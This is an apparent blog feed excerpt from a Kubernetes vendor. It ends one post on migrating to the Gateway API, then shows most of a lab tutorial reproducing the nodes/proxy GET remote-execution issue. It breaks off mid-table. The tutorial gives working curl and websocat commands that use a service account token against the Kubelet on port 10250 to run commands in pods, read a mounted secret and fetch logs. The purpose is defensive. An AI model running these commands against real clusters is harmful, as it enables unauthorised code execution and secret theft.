<p>If you’re not sure whether to hang onto Ingress with one of the Ingress Controllers that’s still being maintained, like Traefik, or to migrate to the Gateway API right now, we’d strongly encourage you to pick a sensible default: Envoy Gateway with the Gateway API. It will require some initial setup to migrate, but once it’s in place, we don’t expect you to need to change it much.</p>

<p>In summary, we covered:</p>

<ul>
  <li>The double whammy of Ingress being sidelined by the community as a “legacy” technology, and ingress-nginx being deprecated with a very short notice period.</li>
  <li>A sensible default for implementing Gateway API with Envoy Gateway.</li>
  <li>How to map Gateway API resources to the OpenFaaS gateway and dashboard, including TLS termination from Let’s Encrypt.</li>
</ul>

<p>If taking on Gateway API feels like too much right now, do not be tempted to continue using ingress-nginx in its unmaintained state. It’s had severe security issues in the recent past like <a href="https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/">CVE-2025-1974</a> on March 24 2025. Instead, you can get the basic routing, load balancing and TLS termination from Traefik. We’ve updated our <a href="https://docs.openfaas.com/reference/tls-openfaas/">existing guide on Ingress</a> to reflect this.</p>

<p>For questions, comments and suggestions, reach out to us via your existing support channels, or through the form on our <a href="https://www.openfaas.com/pricing/">Pricing page</a>.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="ingress" /><category term="tls" /><category term="gateway-api" /><summary type="html"><![CDATA[Learn how to migrate OpenFaaS to the Kubernetes Gateway API with TLS certs from Let's Encrypt]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-02-gwapi/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-02-gwapi/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?</title><link href="https://www.openfaas.com/blog/kubernetes-node-proxy-rce/" rel="alternate" type="text/html" title="How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?" /><published>2026-01-27T00:00:00+00:00</published><updated>2026-01-27T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/kubernetes-node-proxy-rce</id><content type="html" xml:base="https://www.openfaas.com/blog/kubernetes-node-proxy-rce/"><![CDATA[<p>We spin up a temporary Kubernetes cluster to explore and address a newly surfaced security vulnerability in Kubernetes.</p>

<p>Security researcher Graham Helton recently disclosed an interesting Kubernetes RBAC behavior: <a href="https://grahamhelton.com/blog/nodes-proxy-rce">nodes/proxy GET permissions allow command execution in any Pod</a>. The Kubernetes Security Team closed this as “working as intended,” but it’s worth understanding the implications.</p>

<p>OpenFaaS is a popular serverless platform for running functions on Kubernetes, and is used by individual product teams, and for multi-tenant environments.</p>

<p>As a preamble, we should say that this is not specific to OpenFaaS, but should be well understood by any operator configuring OpenFaaS for production use.</p>

<p>In this post, we’ll:</p>

<ol>
  <li>Spin up a K3s cluster in a Firecracker microVM using <a href="https://slicervm.com">SlicerVM</a>. You could also use a public cloud VM like AWS EC2.</li>
  <li>Install OpenFaaS Pro with <code class="language-plaintext highlighter-rouge">clusterRole: true</code> (which grants <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>).</li>
  <li>Use the service account’s token to execute commands in any Pod by connecting directly to the Kubelet on port 10250.</li>
  <li>Discuss why, although unexpected, this isn’t the risk you might think it is.</li>
</ol>

<h2 id="the-vulnerability-in-brief">The vulnerability in brief</h2>

<p>This capability only becomes meaningful if the token for a specific internal Kubernetes service account is compromised, and the attacker can reach the Kubelet API - conditions that should not exist in a well-run production cluster.</p>

<p>In brief, this vulnerability requires:</p>

<ul>
  <li>Possession of a Kubernetes service account token with nodes/proxy (GET) access</li>
  <li>Network reachability to a node’s Kubelet server on port 10250</li>
</ul>

<p>This is not a remote unauthenticated exploit, and it is not reachable via the OpenFaaS API. It requires an already-compromised Kubernetes service account token and a network path to the Kubelet.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌─────────────────────────────────────────────────────────────────────────┐
│                         The Attack Flow                                 │
└─────────────────────────────────────────────────────────────────────────┘

  ┌───────────────┐         ┌──────────────────┐         ┌──────────────┐
  │   Attacker    │         │   K8s API Server │         │    Kubelet   │
  │ (with token)  │         │                  │         │  (port 10250)│
  └───────┬───────┘         └────────┬─────────┘         └──────┬───────┘
          │                          │                          │
          │  1. GET nodes/proxy      │                          │
          │  ────────────────────►   │                          │
          │                          │                          │
          │  ✓ Authorized (GET)      │                          │
          │  ◄────────────────────   │                          │
          │                          │                          │
          │  2. WebSocket upgrade to Kubelet ──────────────────►│
          │     (still a GET!)                                  │
          │                          │                          │
          │  3. /exec/namespace/pod?command=id ────────────────►│
          │     (exec via WebSocket)                            │
          │                          │                          │
          │  ✓ Kubelet allows it     │                          │
          │  ◄──────────────────────────────────────────────────│
          │     (sees GET, not exec)                            │
          │                          │                          │
          ▼                          ▼                          ▼

  The Kubelet checks the HTTP method (GET) not the action (exec)
  ═══════════════════════════════════════════════════════════════
</code></pre></div></div>

<p>The Kubelet makes authorization decisions based on the HTTP method of the initial WebSocket handshake (<code class="language-plaintext highlighter-rouge">GET</code>), not the operation being performed (<code class="language-plaintext highlighter-rouge">exec</code>). Since WebSockets require an HTTP GET to establish the connection, a service account with only <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> can execute commands in any Pod by connecting directly to the Kubelet on port 10250.</p>
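<p>To make that concrete, here’s a sketch of the kind of request involved, using <code class="language-plaintext highlighter-rouge">websocat</code> (which we install in the lab below). The node IP, pod, and container names are placeholders taken from our own cluster - substitute your own. Note that the Kubelet speaks the <code class="language-plaintext highlighter-rouge">v4.channel.k8s.io</code> subprotocol, so the raw output includes stream-framing bytes:</p>

```shell
# Placeholders from our lab - substitute your own node IP, pod and container.
NODE_IP=172.16.0.2
TOKEN=$(kubectl create token openfaas-prometheus -n openfaas --duration=1h)

# The WebSocket upgrade is an HTTP GET, which is all the Kubelet checks.
# The command to run is passed via the "command" query parameter.
websocat -k --binary --protocol v4.channel.k8s.io \
  -H "Authorization: Bearer $TOKEN" \
  "wss://$NODE_IP:10250/exec/openfaas/gateway-5596cbd757-f9kws/gateway?command=id&output=1&error=1"
```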

<p>According to Helton, his search found 69 affected publicly listed Helm charts, including Prometheus, Datadog, Grafana, and OpenFaaS when deployed with <code class="language-plaintext highlighter-rouge">clusterRole: true</code>. The common theme with each of these is that they gather key metrics and log data from individual nodes in order to provide value to the end user - monitoring, or in the case of OpenFaaS, both monitoring and autoscaling.</p>

<h3 id="a-note-on-alerts-from-cve-scanners-in-general">A note on alerts from CVE scanners in general</h3>

<p>We often get emails to our support inbox from customers who are concerned about automated vulnerability reports where a CVE is found in a base image or the Go runtime. That’s normal, and having a defined process for fixes and turn-around is important for any vendor that deals with risk-sensitive enterprise customers. Typically, the CVE in question will be a false positive: yes, it is present, but it is not exercised in any way in the codebase. We’ll sometimes nudge customers to run <code class="language-plaintext highlighter-rouge">govulncheck</code> against the binary to see that for themselves.</p>

<p>That doesn’t mean we ignore CVEs that concern customers - we’re very responsive. However, we also don’t want them to be distracted by false positives.</p>

<h2 id="tutorial">Tutorial</h2>

<h3 id="our-lab-setup">Our lab setup</h3>

<p>We’ll use <a href="https://slicervm.com">SlicerVM</a> to spin up a temporary Kubernetes cluster in a Firecracker microVM. You could also use a public Kubernetes service or your VM provider of choice.</p>

<p>This is what it’ll look like: pretty much everything is installed and set up for you, including the login step for <code class="language-plaintext highlighter-rouge">faas-cli</code> and configuring <code class="language-plaintext highlighter-rouge">kubectl</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Host                        Firecracker microVM
  │                                  │
  │  slicer up k3s-rce.yaml          │
  │─────────────────────────────────►│
  │                                  │
  │  .secrets/LICENSE ──(VSOCK)─────►│ /run/slicer/secrets/
  │                                  │
  │                                  │  userdata.sh starts
  │                                  │        │
  │                                  │        ▼
  │                                  │  ┌──────────┐
  │                                  │  │  arkade  │ get kubectl, helm,
  │                                  │  └────┬─────┘ faas-cli, k3sup...
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │  k3sup   │ install K3s
  │                                  │  └────┬─────┘
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │   helm   │ install OpenFaaS Pro
  │                                  │  └────┬─────┘ (clusterRole=true)
  │                                  │       │
  │                                  │       ▼
  │                                  │  Ready! K3s + OpenFaaS
  │                                  │
  │  slicer vm shell ───────────────►│  ubuntu@k3s-rce-1:~$
  │                                  │
</code></pre></div></div>

<p><a href="https://slicervm.com">SlicerVM</a> is a tool we’ve used internally since around 2022 for building out Kubernetes clusters on bare-metal, on our own hardware. Sometimes, that’s a mini PC in the office, and at other times, it’s a larger, public-facing bare-metal server from a vendor like Hetzner. It gets around a few prickly issues with cloud-based K8s, such as excessive cost, slow setup, and a very limited number of Pods per machine.</p>

<p>In late 2025, <a href="https://blog.alexellis.io/slicer-bare-metal-preview/">we released it for general consumption</a>, with an additional mode to launch disposable VMs for automation and coding agents, and we’ve been building up an engaged community of users on our Discord server.</p>

<p>The point is: from the moment a customer support request comes in, we can have a full installation of OpenFaaS and K3s in under a minute. This is a key part of our customer support process: rapid responses and fast iteration on new features, with higher performance at lower cost than public cloud.</p>

<p>Leave 1-2 clusters running on AWS EKS for some research? You may find your manager breathing down your neck about a mysterious 2000 USD AWS bill.</p>

<p>We don’t have that problem. We’ll show you a quick way to spin up OpenFaaS with K3s in a microVM, like we’d do for a customer support request.</p>

<p>SlicerVM can also run autoscaling Kubernetes nodes, and can run HA across a number of VMs or physical hosts. You can find out more in the <a href="https://docs.slicervm.com/">Kubernetes section of the docs</a>.</p>

<h3 id="step-1-set-up-the-secrets">Step 1: Set up the secrets</h3>

<p>On a machine with Linux installed, and KVM available (bare-metal or nested virtualization), <a href="https://docs.slicervm.com/getting-started/install/">install Slicer</a>.</p>

<p>You can use a <a href="https://slicervm.com/pricing">commercial seat, or your Home Edition license</a>.</p>

<p>Create a working directory for the lab.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> k3s-rce
<span class="nb">cd </span>k3s-rce
</code></pre></div></div>

<p>Create a <code class="language-plaintext highlighter-rouge">.secrets/</code> folder with your OpenFaaS license. Slicer’s secret store syncs files securely into the VM via its guest agent over VSOCK - no need to expose secrets in userdata.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo mkdir</span> <span class="nt">-p</span> .secrets
<span class="nb">sudo chmod </span>700 .secrets

<span class="c"># Copy from your existing license location</span>
<span class="nb">sudo cp</span> ~/.openfaas/LICENSE .secrets/LICENSE
</code></pre></div></div>

<h3 id="step-2-create-the-userdata-script">Step 2: Create the userdata script</h3>

<p>Create <code class="language-plaintext highlighter-rouge">userdata.sh</code> to bootstrap K3s and OpenFaaS Pro:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="nb">set</span> <span class="nt">-ex</span>

<span class="nb">export </span><span class="nv">HOME</span><span class="o">=</span>/home/ubuntu
<span class="nb">export </span><span class="nv">USER</span><span class="o">=</span>ubuntu
<span class="nb">cd</span> /home/ubuntu/

<span class="o">(</span>
arkade update
arkade get kubectl helm faas-cli k3sup stern jq websocat <span class="nt">--path</span> /usr/local/bin
<span class="nb">chown</span> <span class="nv">$USER</span> /usr/local/bin/<span class="k">*</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> .kube
<span class="o">)</span>

<span class="o">(</span>
k3sup <span class="nb">install</span> <span class="nt">--local</span> <span class="nt">--k3s-extra-args</span> <span class="s1">'--disable traefik'</span>
<span class="nb">mv</span> ./kubeconfig ./.kube/config
<span class="nb">chown</span> <span class="nv">$USER</span> .kube/config
<span class="o">)</span>

<span class="nb">export </span><span class="nv">KUBECONFIG</span><span class="o">=</span>/home/ubuntu/.kube/config

<span class="c"># Block until ready</span>
k3sup ready <span class="nt">--kubeconfig</span> <span class="nv">$KUBECONFIG</span>

<span class="o">(</span>
kubectl apply <span class="nt">-f</span> https://raw.githubusercontent.com/openfaas/faas-netes/master/namespaces.yml

kubectl create secret generic <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  openfaas-license <span class="se">\</span>
  <span class="nt">--from-file</span><span class="o">=</span><span class="nv">license</span><span class="o">=</span>/run/slicer/secrets/LICENSE

helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade <span class="nt">--install</span> openfaas openfaas/openfaas <span class="se">\</span>
  <span class="nt">--namespace</span> openfaas <span class="se">\</span>
  <span class="nt">-f</span> https://raw.githubusercontent.com/openfaas/faas-netes/refs/heads/master/chart/openfaas/values-pro.yaml <span class="se">\</span>
  <span class="nt">--set</span> <span class="nv">clusterRole</span><span class="o">=</span><span class="nb">true

</span><span class="nv">PASSWORD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas basic-auth <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s2">"{.data.basic-auth-password}"</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$PASSWORD</span><span class="s2">"</span> <span class="o">&gt;</span> /home/ubuntu/.openfaas-password

<span class="nb">chown</span> <span class="nt">-R</span> <span class="nv">$USER</span> <span class="nv">$HOME</span>
<span class="nb">echo</span> <span class="s2">"export OPENFAAS_URL=http://127.0.0.1:31112"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="nb">echo</span> <span class="s2">"export KUBECONFIG=/home/ubuntu/.kube/config"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="nb">echo</span> <span class="s2">"cat /home/ubuntu/.openfaas-password | faas-cli login --password-stdin"</span> <span class="o">&gt;&gt;</span> <span class="nv">$HOME</span>/.bashrc
<span class="o">)</span>
</code></pre></div></div>

<h3 id="step-3-generate-the-vm-config">Step 3: Generate the VM config</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>slicer new k3s-rce <span class="se">\</span>
  <span class="nt">--graceful-shutdown</span><span class="o">=</span><span class="nb">false</span> <span class="se">\</span>
  <span class="nt">--net</span><span class="o">=</span>isolated <span class="se">\</span>
  <span class="nt">--allow</span><span class="o">=</span>0.0.0.0/0 <span class="se">\</span>
  <span class="nt">--cpu</span><span class="o">=</span>2 <span class="se">\</span>
  <span class="nt">--ram</span><span class="o">=</span>4 <span class="se">\</span>
  <span class="nt">--userdata-file</span> ./userdata.sh <span class="se">\</span>
  <span class="o">&gt;</span> k3s-rce.yaml
</code></pre></div></div>

<p>Feel free to explore the YAML file to see what’s going on, you can edit it, or add additional settings via <code class="language-plaintext highlighter-rouge">slicer new --help</code>.</p>

<h3 id="step-4-start-the-vm">Step 4: Start the VM</h3>

<p>We tend to run Slicer in a tmux window, so we can detach and reconnect later.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tmux new <span class="nt">-s</span> slicer
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer up ./k3s-rce.yaml
</code></pre></div></div>

<p>On the first run, the base VM image will be downloaded and unpacked. This can take anywhere from a few seconds to a minute or so, after which new VM launches will be almost instant.</p>

<p>Then once booted, the userdata to set up K3s and wait for its readiness could also take a minute or two.</p>

<p>The following command will block until userdata has fully completed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer vm ready <span class="nt">--userdata</span>
</code></pre></div></div>

<h3 id="step-5-shell-into-the-vm">Step 5: Shell into the VM</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-E</span> slicer vm shell <span class="nt">--uid</span> 1000

<span class="c"># Or give the VM name explicitly</span>
<span class="nb">sudo</span> <span class="nt">-E</span> slicer vm shell <span class="nt">--uid</span> 1000 k3s-rce-1
</code></pre></div></div>

<p>Once inside, verify OpenFaaS is running:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to Ubuntu 22.04.5 LTS <span class="o">(</span>GNU/Linux 5.10.240 x86_64<span class="o">)</span>
ubuntu@k3s-rce-1:~<span class="err">$</span>

kubectl get pods <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="step-6-extract-the-prometheus-service-account-token">Step 6: Extract the prometheus service account token</h3>

<p>The OpenFaaS prometheus deployment uses a service account with <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> for scraping metrics:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TOKEN</span><span class="o">=</span><span class="si">$(</span>kubectl create token openfaas-prometheus <span class="nt">-n</span> openfaas <span class="nt">--duration</span><span class="o">=</span>1h<span class="si">)</span>
<span class="nb">echo</span> <span class="nv">$TOKEN</span>
</code></pre></div></div>

<p>You’ll be presented with a JWT. You can copy and paste it into <a href="https://jwt.io">https://jwt.io</a>, or any other standard JWT decoder, to inspect the claims.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"aud"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="s2">"https://kubernetes.default.svc.cluster.local"</span><span class="p">,</span><span class="w">
    </span><span class="s2">"k3s"</span><span class="w">
  </span><span class="p">],</span><span class="w">
  </span><span class="nl">"exp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769517043</span><span class="p">,</span><span class="w">
  </span><span class="nl">"iat"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769513443</span><span class="p">,</span><span class="w">
  </span><span class="nl">"iss"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://kubernetes.default.svc.cluster.local"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"jti"</span><span class="p">:</span><span class="w"> </span><span class="s2">"6f6c4370-ecda-4661-8ed0-803b6dc4ea64"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"kubernetes.io"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"namespace"</span><span class="p">:</span><span class="w"> </span><span class="s2">"openfaas"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"serviceaccount"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"openfaas-prometheus"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"uid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"593cba9a-8dd7-488b-96c0-d44bd5a6d703"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"nbf"</span><span class="p">:</span><span class="w"> </span><span class="mi">1769513443</span><span class="p">,</span><span class="w">
  </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"system:serviceaccount:openfaas:openfaas-prometheus"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Verify the permissions:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl auth can-i <span class="nt">--list</span> <span class="nt">--as</span><span class="o">=</span>system:serviceaccount:openfaas:openfaas-prometheus | <span class="nb">grep </span>nodes

Resources      Non-Resource URLs     Resource Names   Verbs
nodes/proxy    <span class="o">[]</span>                    <span class="o">[]</span>               <span class="o">[</span>get list watch]
nodes          <span class="o">[]</span>                    <span class="o">[]</span>               <span class="o">[</span>get list watch]
</code></pre></div></div>

<p>The key permission here is <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>.</p>

<h3 id="step-7-discover-the-node-ip-and-pods">Step 7: Discover the node IP and pods</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">NODE_IP</span><span class="o">=</span><span class="si">$(</span>kubectl get nodes <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].status.addresses[?(@.type=="InternalIP")].address}'</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"Node IP: </span><span class="nv">$NODE_IP</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Pods:"</span>
curl <span class="nt">-sk</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="s2">"https://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/pods"</span> | jq <span class="nt">-r</span> <span class="s1">'.items[] | "\(.metadata.namespace)/\(.metadata.name)"'</span> | <span class="nb">head</span> <span class="nt">-10</span>

</code></pre></div></div>

<p>Example output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Node IP: 172.16.0.2

Pods:
kube-system/metrics-server-7b9c9c4b9c-79tn9
openfaas/autoscaler-5c9677bb4d-pxklm
openfaas/queue-worker-586c6c964b-fzvj9
openfaas/queue-worker-586c6c964b-lq6tf
openfaas/gateway-5596cbd757-f9kws
openfaas/prometheus-d9665fc79-vczwd
kube-system/coredns-7f496c8d7d-j6dsn
kube-system/local-path-provisioner-578895bd58-zhl9q
openfaas/nats-5cfd5b5bc8-mphfb
openfaas/queue-worker-586c6c964b-mvl9f
</code></pre></div></div>

<h3 id="step-8-execute-commands-via-websocket">Step 8: Execute commands via WebSocket</h3>

<p>Here’s the exploit. Despite only having <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code>, we can exec into any pod.</p>

<p>Find a gateway pod, and then use the token to exec into it:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">POD</span><span class="o">=</span><span class="si">$(</span>kubectl get pods <span class="nt">-n</span> openfaas <span class="nt">-l</span> <span class="nv">app</span><span class="o">=</span>gateway <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].metadata.name}'</span><span class="si">)</span>

websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas/</span><span class="nv">$POD</span><span class="s2">/operator?output=1&amp;error=1&amp;command=id"</span>
</code></pre></div></div>

<p>Output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uid=100(app) gid=65533(nogroup) groups=65533(nogroup)
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>Now let’s create a secret for a function, deploy the function, then use the exec approach to obtain the contents of the secret.</p>

<p>This is a toy function that simply echoes its hostname. It doesn’t consume the secret, but the secret is still mounted into the function.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret create api-key <span class="nt">--from-literal</span><span class="o">=</span>secret-key

faas-cli deploy <span class="nt">--name</span> fn1 <span class="se">\</span>
  <span class="nt">--image</span> ghcr.io/openfaas/alpine:latest <span class="se">\</span>
  <span class="nt">--secret</span> api-key <span class="se">\</span>
  <span class="nt">--env</span> <span class="nv">fprocess</span><span class="o">=</span><span class="s2">"cat /etc/hostname"</span>

<span class="c"># Try out the function</span>

faas-cli invoke fn1 <span class="o">&lt;&lt;&lt;</span> <span class="s2">""</span>
fn1-dff95b7d8-zdncl
</code></pre></div></div>

<p>Now, get the Pod name for the function as before:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">POD</span><span class="o">=</span><span class="si">$(</span>kubectl get pods <span class="nt">-n</span> openfaas-fn <span class="nt">-l</span> <span class="nv">faas_function</span><span class="o">=</span>fn1 <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">'{.items[0].metadata.name}'</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s2">"Function Pod: </span><span class="nv">$POD</span><span class="s2">"</span>
</code></pre></div></div>

<p>Next, use <code class="language-plaintext highlighter-rouge">websocat</code> to exec into the function pod, first listing and then reading secrets at the standard mount path of <code class="language-plaintext highlighter-rouge">/var/openfaas/secrets</code>:</p>

<p>The example given by Helton only runs a single command without arguments. To pass a target file or directory, we need to extend it by repeating <code class="language-plaintext highlighter-rouge">&amp;command=</code> for each additional argument.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?output=1&amp;error=1&amp;command=ls&amp;command=/var/openfaas/secrets"</span>
</code></pre></div></div>

<p>Output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>total 8
-rw-r--r-- 1 root root 4096 Jan 27 12:00 api-key
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>Now, obtain the secret contents:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>websocat <span class="nt">--insecure</span> <span class="se">\</span>
  <span class="nt">--header</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="nt">--protocol</span> v4.channel.k8s.io <span class="se">\</span>
  <span class="s2">"wss://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/exec/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?output=1&amp;error=1&amp;command=cat&amp;command=/var/openfaas/secrets/api-key"</span>
</code></pre></div></div>

<p>The output shows the contents of the secret:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secret-key
{"metadata":{},"status":"Success"}
</code></pre></div></div>

<p>So, we’ve successfully executed commands in a Pod, and obtained the contents of a secret.</p>

<p>What may be less obvious is that the same <code class="language-plaintext highlighter-rouge">nodes/proxy GET</code> permission can be used to fetch container logs. Ideally, functions should not log sensitive data to stdout/stderr; however, some teams may consider even the name of a function to be confidential information.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ubuntu@k3s-rce-1:~<span class="nv">$ </span>curl <span class="nt">-sk</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span>
  <span class="s2">"https://</span><span class="nv">$NODE_IP</span><span class="s2">:10250/containerLogs/openfaas-fn/</span><span class="nv">$POD</span><span class="s2">/fn1?tailLines=100&amp;timestamps=true"</span>

2026-01-27T11:42:58.759721814Z 2026/01/27 11:42:58 Version: 0.3.3	SHA: bf545828573185cd03ebc60254ba3d01d6bbcc5b
2026-01-27T11:42:58.760982598Z 2026/01/27 11:42:58 Timeouts: <span class="nb">read</span>: 30s write: 30s hard: 0s health: 30s.
2026-01-27T11:42:58.760992609Z 2026/01/27 11:42:58 Listening on port: 8080
2026-01-27T11:42:58.760995637Z 2026/01/27 11:42:58 Writing lock-file to: /tmp/.lock
2026-01-27T11:42:58.760997950Z 2026/01/27 11:42:58 Metrics listening on port: 8081
2026-01-27T11:43:01.643064545Z 2026/01/27 11:43:01 Forking fprocess.
2026-01-27T11:43:01.643729053Z 2026/01/27 11:43:01 Wrote 20 Bytes - Duration: 0.000705s
2026-01-27T12:48:13.897806818Z 2026/01/27 12:48:13 Forking fprocess.
2026-01-27T12:48:13.898409344Z 2026/01/27 12:48:13 Wrote 20 Bytes - Duration: 0.000573s
2026-01-27T12:48:15.076840450Z 2026/01/27 12:48:15 Forking fprocess.
2026-01-27T12:48:15.077518996Z 2026/01/27 12:48:15 Wrote 20 Bytes - Duration: 0.000736s
</code></pre></div></div>

<h2 id="what-weve-learned-from-this-exercise">What we’ve learned from this exercise</h2>

<h3 id="this-isnt-as-scary-as-it-sounds">This isn’t as scary as it sounds</h3>

<p>The dramatic headline of the disclosure makes this look catastrophic. In practice, a properly configured OpenFaaS deployment, combined with best practices for kubectl access, neutralises the risk.</p>

<p><em>1. OpenFaaS for Enterprises has its own IAM system</em></p>

<p>No OpenFaaS IAM role grants access to Kubernetes service account tokens. Users interact via the OpenFaaS API/CLI, not via <code class="language-plaintext highlighter-rouge">kubectl</code>. The Prometheus service account is internal infrastructure, and is not accessible to users.</p>

<p>If you’re running OpenFaaS Standard, the same holds; however, instead of fine-grained IAM and user accounts, you’re likely using a single user account for administration. That account exists within OpenFaaS, not within Kubernetes.</p>

<p>We believe that end-users, who write, deploy and support functions can perform their duties without the need for <code class="language-plaintext highlighter-rouge">kubectl</code> access. The <code class="language-plaintext highlighter-rouge">faas-cli</code>, OpenFaaS Dashboard, and CLI/REST API provide all functionality required for users to manage their functions, and monitor their usage. Enterprise users can also <a href="https://docs.openfaas.com/openfaas-pro/iam/auditing/">enable auditing for the API</a>.</p>

<p>Ideally, only trusted staff within the DevOps or infrastructure teams should have <code class="language-plaintext highlighter-rouge">kubectl</code> access, aligned with best practices of least privilege and short-lived credentials.</p>

<p><em>2. Users should never have kubectl access in production</em></p>

<p>The ideal deployment pattern:</p>

<table>
  <thead>
    <tr>
      <th>Environment</th>
      <th>Access Model</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Local dev on your own machine</td>
